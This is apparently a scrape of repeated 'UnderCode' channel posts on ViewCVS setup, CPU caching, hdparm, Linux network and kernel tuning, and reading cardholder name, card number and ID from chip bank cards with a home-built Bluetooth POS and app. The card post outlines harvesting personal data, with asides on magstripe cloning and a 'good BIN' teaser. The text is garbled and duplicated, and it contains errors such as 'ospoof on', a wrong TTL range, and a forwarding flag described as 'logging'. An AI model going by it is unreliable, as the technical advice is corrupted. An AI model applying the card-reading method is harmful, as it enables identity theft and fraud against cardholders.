5) I set up two virtual hosts: mavencn and bsd Corresponding to site.example.com and site.example2dns.com respectively. The default_root attribute in the general section is set for the two virtual hosts below.
π¦ Installation precautions
First of all, you must pay attention to the file and directory permission settings in CVS. You must give the web server running account read permissions. When I use the cvsd service in ports in FreeBSD, I set its umask to 022.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Installation precautions
First of all, you must pay attention to the file and directory permission settings in CVS. You must give the web server running account read permissions. When I use the cvsd service in ports in FreeBSD, I set its umask to 022.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
pinterest.com/UnderCodeOfficial
π¦ ππΌππ πππΈβπ :
1) When it comes to sensitive information, everyone first thinks of the ID number.
2) What harm will happen if the ID number is leaked? The offenders use it to handle credit cards, report your bank card, intermediary fraud, use your information to commit illegal crimes, etc. The harm in this is really inevitable. Today, I will work with you to read the ID number from the bank card with chip.
π¦ Bank card background
!) From a security point of view, the magnetic stripe card has gradually withdrawn from the historical stage. At present, clone cards and stolen brushes that are frequently issued occur on magnetic stripe cards. Because magnetic stripe cards have only three tracks to store information, The bank card generally only needs to obtain the two-track data to complete the cloning of the bank card, and the two-track data can be easily obtained through a credit card reader of tens of yuan.
2) However, changing to a bank card with a chip is too secure. The issuing bank certificate, IC card public certificate, and certification center certificate are public and private keys that guarantee offline bank card transactions. And online transactions are more secure, requiring the UnionPay back office to strictly check the data of each domain in each card.
3) Although IC cards have the aforementioned security features, there is still a risk of obtaining sensitive information. According to the transaction process of the australia Financial Integrated Circuit IC Card specification, people with ulterior motives can use POS to obtain IC card application selection, application initialization, and read application data steps to obtain interactive data. The TLV format application data obtained at this step may contain Cardholder's identification number. Here are the specific steps.
π¦What I want to accomplish in the experiment:
1) Mobile phone: Use the SDK provided by the Bluetooth chip manufacturer to develop the Android version of the app "Bluetooth MPOS", and MPOS and APP "Bluetooth MPOS" use Bluetooth for data interaction
2) POS side: write the program in the MPOS microcontroller to complete the IC card data exchange, obtain the cardholder name, card number, and cardholder ID number.
Note: interested in technology can communicate privately
3) After the pairing is completed, execute the "Cardholder Personal Information" button on the collection side
4) After the MPOS terminal interacts with the IC to obtain TLV format data, it finds sensitive information and uploads it to the mobile phone
5) The mobile app analyzes the name, card number, and identity data sent by the POS
The obtained name, card number and ID number are displayed.
π¦From the above experiments, the debit card can read out the name, certificate number and card number on a mobile phone and a card reader without the need for Internet connection. But don't worry too much, because the name and ID number are not necessary data in the card, which means that not all cards can read the cardholder's name and ID number. Of course, even the card that can be read out cannot be operated by anyone
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
pinterest.com/UnderCodeOfficial
π¦ ππΌππ πππΈβπ :
1) When it comes to sensitive information, everyone first thinks of the ID number.
2) What harm will happen if the ID number is leaked? The offenders use it to handle credit cards, report your bank card, intermediary fraud, use your information to commit illegal crimes, etc. The harm in this is really inevitable. Today, I will work with you to read the ID number from the bank card with chip.
π¦ Bank card background
!) From a security point of view, the magnetic stripe card has gradually withdrawn from the historical stage. At present, clone cards and stolen brushes that are frequently issued occur on magnetic stripe cards. Because magnetic stripe cards have only three tracks to store information, The bank card generally only needs to obtain the two-track data to complete the cloning of the bank card, and the two-track data can be easily obtained through a credit card reader of tens of yuan.
2) However, changing to a bank card with a chip is too secure. The issuing bank certificate, IC card public certificate, and certification center certificate are public and private keys that guarantee offline bank card transactions. And online transactions are more secure, requiring the UnionPay back office to strictly check the data of each domain in each card.
3) Although IC cards have the aforementioned security features, there is still a risk of obtaining sensitive information. According to the transaction process of the australia Financial Integrated Circuit IC Card specification, people with ulterior motives can use POS to obtain IC card application selection, application initialization, and read application data steps to obtain interactive data. The TLV format application data obtained at this step may contain Cardholder's identification number. Here are the specific steps.
π¦What I want to accomplish in the experiment:
1) Mobile phone: Use the SDK provided by the Bluetooth chip manufacturer to develop the Android version of the app "Bluetooth MPOS", and MPOS and APP "Bluetooth MPOS" use Bluetooth for data interaction
2) POS side: write the program in the MPOS microcontroller to complete the IC card data exchange, obtain the cardholder name, card number, and cardholder ID number.
Note: interested in technology can communicate privately
3) After the pairing is completed, execute the "Cardholder Personal Information" button on the collection side
4) After the MPOS terminal interacts with the IC to obtain TLV format data, it finds sensitive information and uploads it to the mobile phone
5) The mobile app analyzes the name, card number, and identity data sent by the POS
The obtained name, card number and ID number are displayed.
π¦From the above experiments, the debit card can read out the name, certificate number and card number on a mobile phone and a card reader without the need for Internet connection. But don't worry too much, because the name and ID number are not necessary data in the card, which means that not all cards can read the cardholder's name and ID number. Of course, even the card that can be read out cannot be operated by anyone
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UndercOde (UNDERCODEOFFICIAL) on Pinterest
UndercOde | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed ββoptimization-read and write on memory
instagram.com/undercodetestingcompany
π¦ ππΌππ πππΈβπ :
Inside the computer, data reading and writing is realized step by step.
1) read the situation: a data to reach the cpu from the outside, you must go through external storage ---> "memory ---" "second-level cache ---" "first-level cache ---" "cpu register ---" participate in calculation .
2) Writing: Generally, the data generated by the CPU is not (and may not be) written to external storage immediately. Then these data are often retained in the cache or memory first, and the write action will not take place until the CPU informs the write.
3) When multiple data are to be read, they are queued. Similarly, when multiple data are to be written, they are also queued.
4) When there are read and write requests at the same time, the CPU must arrange their order.
π¦ Examples:
1) The CPU needs to read a piece of data: If the data is not found in the current instruction register, the CPU will look up the L1 cache, if not, it will look at the L2 cache, and then the memory and external storage.
2) After the CPU reads in a piece of data, the memory, L2 cache, and L1 cache all have the data. As data reads increase, the cache becomes full. At this time, a strategy of giving up is needed. First-in-first-out or first-in-first-out method, there is another strategy: the most used data is retained.
3) In this way, there is a lot of data in the cache or memory. When the CPU is looking for data, it also needs a strategy: association (full association, semi-association, partial association). That is, the cache is divided into several relatively independent areas, and the data is searched according to a certain strategy when searching for data, which will be more efficient.
4) When the CPU has data to be "written" to the cache, such data should be preferentially retained until the CPU "write" notification arrives.
5) When the read and write requirements occur at the same time, two situations will occur: read first and then write, and write first and then read.
π¦ Both situations must be carefully considered. such as:
1) The data address to be written is exactly the data address to be read. Read first and write later make the old data read. When you need the latest data, an error occurs; write first and read later make the original data overwritten. When you need the original data, read it at this time. The data is also wrong.
2) Although the data address to be written is not the data to be read immediately, its intermediate results are still retained in the cache. This will also produce errors.
This is also called data correlation. Try to avoid (or reduce) data correlation when designing your program. Although the program is compiled to optimize data dependencies.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed ββoptimization-read and write on memory
instagram.com/undercodetestingcompany
π¦ ππΌππ πππΈβπ :
Inside the computer, data reading and writing is realized step by step.
1) read the situation: a data to reach the cpu from the outside, you must go through external storage ---> "memory ---" "second-level cache ---" "first-level cache ---" "cpu register ---" participate in calculation .
2) Writing: Generally, the data generated by the CPU is not (and may not be) written to external storage immediately. Then these data are often retained in the cache or memory first, and the write action will not take place until the CPU informs the write.
3) When multiple data are to be read, they are queued. Similarly, when multiple data are to be written, they are also queued.
4) When there are read and write requests at the same time, the CPU must arrange their order.
π¦ Examples:
1) The CPU needs to read a piece of data: If the data is not found in the current instruction register, the CPU will look up the L1 cache, if not, it will look at the L2 cache, and then the memory and external storage.
2) After the CPU reads in a piece of data, the memory, L2 cache, and L1 cache all have the data. As data reads increase, the cache becomes full. At this time, a strategy of giving up is needed. First-in-first-out or first-in-first-out method, there is another strategy: the most used data is retained.
3) In this way, there is a lot of data in the cache or memory. When the CPU is looking for data, it also needs a strategy: association (full association, semi-association, partial association). That is, the cache is divided into several relatively independent areas, and the data is searched according to a certain strategy when searching for data, which will be more efficient.
4) When the CPU has data to be "written" to the cache, such data should be preferentially retained until the CPU "write" notification arrives.
5) When the read and write requirements occur at the same time, two situations will occur: read first and then write, and write first and then read.
π¦ Both situations must be carefully considered. such as:
1) The data address to be written is exactly the data address to be read. Read first and write later make the old data read. When you need the latest data, an error occurs; write first and read later make the original data overwritten. When you need the original data, read it at this time. The data is also wrong.
2) Although the data address to be written is not the data to be read immediately, its intermediate results are still retained in the cache. This will also produce errors.
This is also called data correlation. Try to avoid (or reduce) data correlation when designing your program. Although the program is compiled to optimize data dependencies.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed ββoptimization-enable hard disk DMA support
fb.com/undercodetesting
π¦ ππΌππ πππΈβπ :
DMA support is not enabled after the anonymous system is installed. In order to improve efficiency, you can enable it:
1) /etc/rc.d/rc.local Add a line / sbin / hdparm -d1 -c3 -m16 / dev / hda
If your hard disk supports ATA33, you can add -X66, ATA66 is -X68.
2) For example, ATA66 is: / sbin / hdparm -d1 -X68 -c3 -m16 / dev / hda
3) We can use hdparm -Tt / dev / hda to test the effect before and after joining. The above tests pay attention to the disaster problems that may bring data, please do not use it at will.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Speed ββoptimization-enable hard disk DMA support
fb.com/undercodetesting
π¦ ππΌππ πππΈβπ :
DMA support is not enabled after the anonymous system is installed. In order to improve efficiency, you can enable it:
1) /etc/rc.d/rc.local Add a line / sbin / hdparm -d1 -c3 -m16 / dev / hda
If your hard disk supports ATA33, you can add -X66, ATA66 is -X68.
2) For example, ATA66 is: / sbin / hdparm -d1 -X68 -c3 -m16 / dev / hda
3) We can use hdparm -Tt / dev / hda to test the effect before and after joining. The above tests pay attention to the disaster problems that may bring data, please do not use it at will.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 97 likes Β· 2 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
π¦ Well for now tutorials :
> Speed optimization-enable hard disk DMA support
> good BIN WWE NETWORT
>Speed optimization-read and write on memory
> Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
> cvs service-ViewCVS install Howto full by undercode
@UnderCodeTesting - e n j o y
> Speed optimization-enable hard disk DMA support
> good BIN WWE NETWORT
>Speed optimization-read and write on memory
> Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
> cvs service-ViewCVS install Howto full by undercode
@UnderCodeTesting - e n j o y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LINUX NET SPEED- Overview of Tuning Methods for Tuning Linux Network Performance
pinterest.com/undercodeOfficial
>in "Debugging Tools for Tuning Linux Network Performance" and "Tuning Linux Network Performance In the two articles "Detailed Network Configuration Files", we introduced the use of three network tuning test tools: route, netstat, and tcpdump, as well as the functions they can implement and the contents of network configuration files. In this article, we will introduce network performance from a practical perspective Tuning method.
Below, we first introduce the first method of network performance tuning: service mode selection.
π¦ ππΌππ πππΈβπ :
To overcome the overhead of this spawning process, you can use multi-threaded or asynchronous mode. In the multi-threaded mode, multiple threads in the process are used to provide services. As the overhead of the threads is small, the performance will be improved. In fact, the method that does not require any additional overhead is asynchronous. It uses a non-blocking method to communicate with each client, and the server uses a process for polling. In asynchronous mode, the scheduling between multiple tasks is done by the server program itself, and once a problem occurs in one place, the entire server will have problems, which is not in the scope of discussion. Increasing the number of system threads: There are many factors that limit the number of threads, mainly the number of processes, the size of memory, and the limits of mutex / semaphore / shm / ipc. Generally, the maximum number of processes is increased first, and then the memory is expanded In increasing the maximum number of threads, the method of increasing the maximum number of threads is very simple. You only need to change two places in glibc: the maximum number of threads and the size of the thread stack area; the increase in the maximum number of threads is based on the asynchronous I of the process. / O performance comes at the cost; so it needs to be balanced.
Useful content in the network configuration file
1) For the database, increasing the number of shared memory segments and semaphores plays a very important role in improving the efficiency of data transmission;
Method: Just edit the file linux / include / linux / sem.h and linux / include / asm-i386 / shmparam.h are sufficient.
2) First increase the maximum number of processes, then expand the memory, and then increase the maximum number of threads, and the method to increase the maximum number of threads is simple, just change two places in glibc: the maximum number of threads and the size of the thread stack area ;
3) Comment out a line in the "/ etc / inittab" file to prevent the computer from being shut down with Control-Alt-Delete. This is important if the server is not in a secure place.
Edit the inittab file (vi / etc / inittab) and change this line:
ca :: ctrlaltdel: / sbin / shutdown -t3 -r now
to:
#ca :: ctrlaltdel: / sbin / shutdown -t3 -r now
use the following command For the changes to take effect:
[root @ deep] # / sbin / init q
4) The /etc/host.conf file specifies how to resolve host names. Linux uses the resolver library to obtain the IP address corresponding to the host name. The following is an example of "/etc/host.conf":
order bind, hosts: Specify the host name query order. It is specified here that DNS is used to resolve the domain name, and then the "/ etc / hosts" file is searched (or vice versa).
π¦You can add the following two sentences to the file:
multi on: The specified host can have multiple addresses. A host with multiple IP addresses is generally called a multi-homed host.
ospoof on: IP address spoofing is not allowed on the server to improve server security. IP spoofing is a means of attacking the security of the system. By masquerading the IP address as another computer, it can gain the trust of other computers.
Tunable Linux kernel network parameters
ICMP related kernel configuration parameters
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LINUX NET SPEED- Overview of Tuning Methods for Tuning Linux Network Performance
pinterest.com/undercodeOfficial
>in "Debugging Tools for Tuning Linux Network Performance" and "Tuning Linux Network Performance In the two articles "Detailed Network Configuration Files", we introduced the use of three network tuning test tools: route, netstat, and tcpdump, as well as the functions they can implement and the contents of network configuration files. In this article, we will introduce network performance from a practical perspective Tuning method.
Below, we first introduce the first method of network performance tuning: service mode selection.
π¦ ππΌππ πππΈβπ :
To overcome the overhead of this spawning process, you can use multi-threaded or asynchronous mode. In the multi-threaded mode, multiple threads in the process are used to provide services. As the overhead of the threads is small, the performance will be improved. In fact, the method that does not require any additional overhead is asynchronous. It uses a non-blocking method to communicate with each client, and the server uses a process for polling. In asynchronous mode, the scheduling between multiple tasks is done by the server program itself, and once a problem occurs in one place, the entire server will have problems, which is not in the scope of discussion. Increasing the number of system threads: There are many factors that limit the number of threads, mainly the number of processes, the size of memory, and the limits of mutex / semaphore / shm / ipc. Generally, the maximum number of processes is increased first, and then the memory is expanded In increasing the maximum number of threads, the method of increasing the maximum number of threads is very simple. You only need to change two places in glibc: the maximum number of threads and the size of the thread stack area; the increase in the maximum number of threads is based on the asynchronous I of the process. / O performance comes at the cost; so it needs to be balanced.
Useful content in the network configuration file
1) For the database, increasing the number of shared memory segments and semaphores plays a very important role in improving the efficiency of data transmission;
Method: Just edit the file linux / include / linux / sem.h and linux / include / asm-i386 / shmparam.h are sufficient.
2) First increase the maximum number of processes, then expand the memory, and then increase the maximum number of threads, and the method to increase the maximum number of threads is simple, just change two places in glibc: the maximum number of threads and the size of the thread stack area ;
3) Comment out a line in the "/ etc / inittab" file to prevent the computer from being shut down with Control-Alt-Delete. This is important if the server is not in a secure place.
Edit the inittab file (vi / etc / inittab) and change this line:
ca :: ctrlaltdel: / sbin / shutdown -t3 -r now
to:
#ca :: ctrlaltdel: / sbin / shutdown -t3 -r now
use the following command For the changes to take effect:
[root @ deep] # / sbin / init q
4) The /etc/host.conf file specifies how to resolve host names. Linux uses the resolver library to obtain the IP address corresponding to the host name. The following is an example of "/etc/host.conf":
order bind, hosts: Specify the host name query order. It is specified here that DNS is used to resolve the domain name, and then the "/ etc / hosts" file is searched (or vice versa).
π¦You can add the following two sentences to the file:
multi on: The specified host can have multiple addresses. A host with multiple IP addresses is generally called a multi-homed host.
ospoof on: IP address spoofing is not allowed on the server to improve server security. IP spoofing is a means of attacking the security of the system. By masquerading the IP address as another computer, it can gain the trust of other computers.
Tunable Linux kernel network parameters
ICMP related kernel configuration parameters
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦speedup net linux speed- IP related kernel configuration parameters The
twitter.com/UndercodeTC
π¦ ππΌππ πππΈβπ :
ip configuration parameters in the linux kernel network parameters are usually used to define or adjust some specific parameters of the ip packet. In addition, it also defines some network characteristics of the system.
1) ip_default_ttl: set the lifetime of the ip packet sent from the machine, the parameter value is an integer, the range is 0 to 128, the default value is 64. In Windows systems, the lifetime of IP packets is usually 128. If your system often receives "Time to live exceeded" icmp response, you can increase the value of this parameter appropriately, but it should not be too large, because if your route is bad, it will increase the system error time.
2) ip_dynaddr: This parameter is usually used in the case of a dial-up connection, which can enable the system to change the source address of an ip packet to that ip address immediately, at the same time interrupt the original TCP session and resend a syn request packet with a new address Start a new TCP conversation. When using IP spoofing, this parameter can immediately change the spoofed address to the new IP address. The parameter values of this parameter can be:
1: Enable the function
2 : Enable the function using the redundant mode
0: Disable the function
π¦ Application Example: When using ipchains to configure IP spoofing to drive a LAN to share a ppp connection to the Internet, sometimes it just appears When a site fails to connect, refresh and connect again, you can set the value of this parameter to 1, and immediately change the masqueraded address to the new IP address, which can solve this kind of problem. The command is:
echo "1"> / proc / sys / net / ipv4 / ip_dynaddr
3) ip_forward: This parameter can be used to enable the packet forwarding function, so that the system acts as a router. When the parameter value is 1, IP forwarding is enabled; when it is 0, IP forwarding is disabled. Note that we can implement IP forwarding on hosts with single or dual network cards.
Application example:
Suppose we use a Linux host with dual network cards as the firewall. At this time we must execute the following command to enable the ip forwarding function:
echo "1"> / proc / sys / net / ipv4 / ip_forward
4) ip_local_port_range: Set the port range used when the local system initiates a TCP or UDP connection request. The setting value is two integers and the default is "1024 4999".
Application example:
echo "1450 6000"> / proc / sys / net / ipv4 / ip_local_port_range
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦speedup net linux speed- IP related kernel configuration parameters The
twitter.com/UndercodeTC
π¦ ππΌππ πππΈβπ :
ip configuration parameters in the linux kernel network parameters are usually used to define or adjust some specific parameters of the ip packet. In addition, it also defines some network characteristics of the system.
1) ip_default_ttl: set the lifetime of the ip packet sent from the machine, the parameter value is an integer, the range is 0 to 128, the default value is 64. In Windows systems, the lifetime of IP packets is usually 128. If your system often receives "Time to live exceeded" icmp response, you can increase the value of this parameter appropriately, but it should not be too large, because if your route is bad, it will increase the system error time.
2) ip_dynaddr: This parameter is usually used in the case of a dial-up connection, which can enable the system to change the source address of an ip packet to that ip address immediately, at the same time interrupt the original TCP session and resend a syn request packet with a new address Start a new TCP conversation. When using IP spoofing, this parameter can immediately change the spoofed address to the new IP address. The parameter values of this parameter can be:
1: Enable the function
2 : Enable the function using the redundant mode
0: Disable the function
π¦ Application Example: When using ipchains to configure IP spoofing to drive a LAN to share a ppp connection to the Internet, sometimes it just appears When a site fails to connect, refresh and connect again, you can set the value of this parameter to 1, and immediately change the masqueraded address to the new IP address, which can solve this kind of problem. The command is:
echo "1"> / proc / sys / net / ipv4 / ip_dynaddr
3) ip_forward: This parameter can be used to enable the packet forwarding function, so that the system acts as a router. When the parameter value is 1, IP forwarding is enabled; when it is 0, IP forwarding is disabled. Note that we can implement IP forwarding on hosts with single or dual network cards.
Application example:
Suppose we use a Linux host with dual network cards as the firewall. At this time we must execute the following command to enable the ip forwarding function:
echo "1"> / proc / sys / net / ipv4 / ip_forward
4) ip_local_port_range: Set the port range used when the local system initiates a TCP or UDP connection request. The setting value is two integers and the default is "1024 4999".
Application example:
echo "1450 6000"> / proc / sys / net / ipv4 / ip_local_port_range
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦speedup linux net tips- Kernel network parameters
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
for each network interface Through the kernel network parameters for each network interface, you can specify the response kernel network parameters for specific network interfaces such as eth0, eth1, and so on. Note: The parameters under / proc / sys / net / ipv4 / conf / all / will apply to all network interfaces.
1) accept_redirects: This parameter is located in / proc / sys / net / ipv4 / conf / DEV / accept_redirects (DEV stands for the specific network interface). If your host has two routers in the network segment, you can set one of them Becomes the default gateway, but when the gateway receives your ip packet and finds that the ip packet must pass through another router, the router will then send you a so-called "redirect" icmp packet to tell the ip packet Forward to another router. The parameter value is Boolean, 1 means to receive such redirected icmp information, 0 means to ignore. The default value is 0 on the Linux host acting as the router, and the default value is 1 on the general Linux host. It is recommended to change it to 0 or use "Security Redirection" (see below) to eliminate security risks.
2) log_martians: logs IP packets containing illegal address information to the kernel log. The parameter value is a Boolean value.
Applications:
We talked about the rp_filter reverse path filtering parameter. At the same time, we can execute the following statement
echo "1"> / proc / sys / net / ipv4 / conf / all / log_martians
and then record the ip spoofed ip packets to var / log / messages.
3) forwarding: enable the IP forwarding function of the specific network interface. The parameter value is a Boolean value, and 1 means logging.
Application example:
echo "1"> / proc / sys / net / ipv4 / conf / eth0 / forwarding
4) accept_source_route: Whether to accept IP packets containing source routing information. The parameter value is Boolean, 1 means accept, 0 means not accept. The default value is 1 on the Linux host acting as the gateway, and 0 on the general Linux host. From a security perspective, we recommend that you turn off this feature.
5) secure_redirects: We have already mentioned the concept of "secure redirects". In fact, the so-called "secure redirects" only accept "redirect" icmp packets from the gateway. This parameter is used to set the "safe redirect" function. The parameter value is a Boolean value, 1 means enabled, 0 means disabled, and the default value is enabled.
6) proxy_arp: Set whether to relay arp packets on the network. The parameter value is Boolean, 1 means relay, 0 means ignore, and the default value is 0. This parameter is usually only useful for linux hosts acting as routers.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦speedup linux net tips- Kernel network parameters
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
for each network interface Through the kernel network parameters for each network interface, you can specify the response kernel network parameters for specific network interfaces such as eth0, eth1, and so on. Note: The parameters under / proc / sys / net / ipv4 / conf / all / will apply to all network interfaces.
1) accept_redirects: This parameter is located in / proc / sys / net / ipv4 / conf / DEV / accept_redirects (DEV stands for the specific network interface). If your host has two routers in the network segment, you can set one of them Becomes the default gateway, but when the gateway receives your ip packet and finds that the ip packet must pass through another router, the router will then send you a so-called "redirect" icmp packet to tell the ip packet Forward to another router. The parameter value is Boolean, 1 means to receive such redirected icmp information, 0 means to ignore. The default value is 0 on the Linux host acting as the router, and the default value is 1 on the general Linux host. It is recommended to change it to 0 or use "Security Redirection" (see below) to eliminate security risks.
2) log_martians: logs IP packets containing illegal address information to the kernel log. The parameter value is a Boolean value.
Applications:
We talked about the rp_filter reverse path filtering parameter. At the same time, we can execute the following statement
echo "1"> / proc / sys / net / ipv4 / conf / all / log_martians
and then record the ip spoofed ip packets to var / log / messages.
3) forwarding: enable the IP forwarding function of the specific network interface. The parameter value is a Boolean value, and 1 means logging.
Application example:
echo "1"> / proc / sys / net / ipv4 / conf / eth0 / forwarding
4) accept_source_route: Whether to accept IP packets containing source routing information. The parameter value is Boolean, 1 means accept, 0 means not accept. The default value is 1 on the Linux host acting as the gateway, and 0 on the general Linux host. From a security perspective, we recommend that you turn off this feature.
5) secure_redirects: We have already mentioned the concept of "secure redirects". In fact, the so-called "secure redirects" only accept "redirect" icmp packets from the gateway. This parameter is used to set the "safe redirect" function. The parameter value is a Boolean value, 1 means enabled, 0 means disabled, and the default value is enabled.
6) proxy_arp: Set whether to relay arp packets on the network. The parameter value is Boolean, 1 means relay, 0 means ignore, and the default value is 0. This parameter is usually only useful for linux hosts acting as routers.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LINUX NET SPEED- Overview of Tuning Methods for Tuning Linux Network Performance
pinterest.com/undercodeOfficial
>in "Debugging Tools for Tuning Linux Network Performance" and "Tuning Linux Network Performance In the two articles "Detailed Network Configuration Files", we introduced the use of three network tuning test tools: route, netstat, and tcpdump, as well as the functions they can implement and the contents of network configuration files. In this article, we will introduce network performance from a practical perspective Tuning method.
Below, we first introduce the first method of network performance tuning: service mode selection.
π¦ ππΌππ πππΈβπ :
To overcome the overhead of this spawning process, you can use multi-threaded or asynchronous mode. In the multi-threaded mode, multiple threads in the process are used to provide services. As the overhead of the threads is small, the performance will be improved. In fact, the method that does not require any additional overhead is asynchronous. It uses a non-blocking method to communicate with each client, and the server uses a process for polling. In asynchronous mode, the scheduling between multiple tasks is done by the server program itself, and once a problem occurs in one place, the entire server will have problems, which is not in the scope of discussion. Increasing the number of system threads: There are many factors that limit the number of threads, mainly the number of processes, the size of memory, and the limits of mutex / semaphore / shm / ipc. Generally, the maximum number of processes is increased first, and then the memory is expanded In increasing the maximum number of threads, the method of increasing the maximum number of threads is very simple. You only need to change two places in glibc: the maximum number of threads and the size of the thread stack area; the increase in the maximum number of threads is based on the asynchronous I of the process. / O performance comes at the cost; so it needs to be balanced.
Useful content in the network configuration file
1) For the database, increasing the number of shared memory segments and semaphores plays a very important role in improving the efficiency of data transmission;
Method: Just edit the file linux / include / linux / sem.h and linux / include / asm-i386 / shmparam.h are sufficient.
2) First increase the maximum number of processes, then expand the memory, and then increase the maximum number of threads, and the method to increase the maximum number of threads is simple, just change two places in glibc: the maximum number of threads and the size of the thread stack area ;
3) Comment out a line in the "/ etc / inittab" file to prevent the computer from being shut down with Control-Alt-Delete. This is important if the server is not in a secure place.
Edit the inittab file (vi / etc / inittab) and change this line:
ca :: ctrlaltdel: / sbin / shutdown -t3 -r now
to:
#ca :: ctrlaltdel: / sbin / shutdown -t3 -r now
use the following command For the changes to take effect:
[root @ deep] # / sbin / init q
4) The /etc/host.conf file specifies how to resolve host names. Linux uses the resolver library to obtain the IP address corresponding to the host name. The following is an example of "/etc/host.conf":
order bind, hosts: Specify the host name query order. It is specified here that DNS is used to resolve the domain name, and then the "/ etc / hosts" file is searched (or vice versa).
π¦You can add the following two sentences to the file:
multi on: The specified host can have multiple addresses. A host with multiple IP addresses is generally called a multi-homed host.
ospoof on: IP address spoofing is not allowed on the server to improve server security. IP spoofing is a means of attacking the security of the system. By masquerading the IP address as another computer, it can gain the trust of other computers.
Tunable Linux kernel network parameters
ICMP related kernel configuration parameters
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LINUX NET SPEED- Overview of Tuning Methods for Tuning Linux Network Performance
pinterest.com/undercodeOfficial
>in "Debugging Tools for Tuning Linux Network Performance" and "Tuning Linux Network Performance In the two articles "Detailed Network Configuration Files", we introduced the use of three network tuning test tools: route, netstat, and tcpdump, as well as the functions they can implement and the contents of network configuration files. In this article, we will introduce network performance from a practical perspective Tuning method.
Below, we first introduce the first method of network performance tuning: service mode selection.
π¦ ππΌππ πππΈβπ :
To overcome the overhead of this spawning process, you can use multi-threaded or asynchronous mode. In the multi-threaded mode, multiple threads in the process are used to provide services. As the overhead of the threads is small, the performance will be improved. In fact, the method that does not require any additional overhead is asynchronous. It uses a non-blocking method to communicate with each client, and the server uses a process for polling. In asynchronous mode, the scheduling between multiple tasks is done by the server program itself, and once a problem occurs in one place, the entire server will have problems, which is not in the scope of discussion. Increasing the number of system threads: There are many factors that limit the number of threads, mainly the number of processes, the size of memory, and the limits of mutex / semaphore / shm / ipc. Generally, the maximum number of processes is increased first, and then the memory is expanded In increasing the maximum number of threads, the method of increasing the maximum number of threads is very simple. You only need to change two places in glibc: the maximum number of threads and the size of the thread stack area; the increase in the maximum number of threads is based on the asynchronous I of the process. / O performance comes at the cost; so it needs to be balanced.
Useful content in the network configuration file
1) For the database, increasing the number of shared memory segments and semaphores plays a very important role in improving the efficiency of data transmission;
Method: Just edit the file linux / include / linux / sem.h and linux / include / asm-i386 / shmparam.h are sufficient.
2) First increase the maximum number of processes, then expand the memory, and then increase the maximum number of threads, and the method to increase the maximum number of threads is simple, just change two places in glibc: the maximum number of threads and the size of the thread stack area ;
3) Comment out a line in the "/ etc / inittab" file to prevent the computer from being shut down with Control-Alt-Delete. This is important if the server is not in a secure place.
Edit the inittab file (vi / etc / inittab) and change this line:
ca :: ctrlaltdel: / sbin / shutdown -t3 -r now
to:
#ca :: ctrlaltdel: / sbin / shutdown -t3 -r now
use the following command For the changes to take effect:
[root @ deep] # / sbin / init q
4) The /etc/host.conf file specifies how to resolve host names. Linux uses the resolver library to obtain the IP address corresponding to the host name. The following is an example of "/etc/host.conf":
order bind, hosts: Specify the host name query order. It is specified here that DNS is used to resolve the domain name, and then the "/ etc / hosts" file is searched (or vice versa).
π¦You can add the following two sentences to the file:
multi on: The specified host can have multiple addresses. A host with multiple IP addresses is generally called a multi-homed host.
ospoof on: IP address spoofing is not allowed on the server to improve server security. IP spoofing is a means of attacking the security of the system. By masquerading the IP address as another computer, it can gain the trust of other computers.
Tunable Linux kernel network parameters
ICMP related kernel configuration parameters
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦speedup net linux speed- IP related kernel configuration parameters The
twitter.com/UndercodeTC
π¦ ππΌππ πππΈβπ :
ip configuration parameters in the linux kernel network parameters are usually used to define or adjust some specific parameters of the ip packet. In addition, it also defines some network characteristics of the system.
1) ip_default_ttl: set the lifetime of the ip packet sent from the machine, the parameter value is an integer, the range is 0 to 128, the default value is 64. In Windows systems, the lifetime of IP packets is usually 128. If your system often receives "Time to live exceeded" icmp response, you can increase the value of this parameter appropriately, but it should not be too large, because if your route is bad, it will increase the system error time.
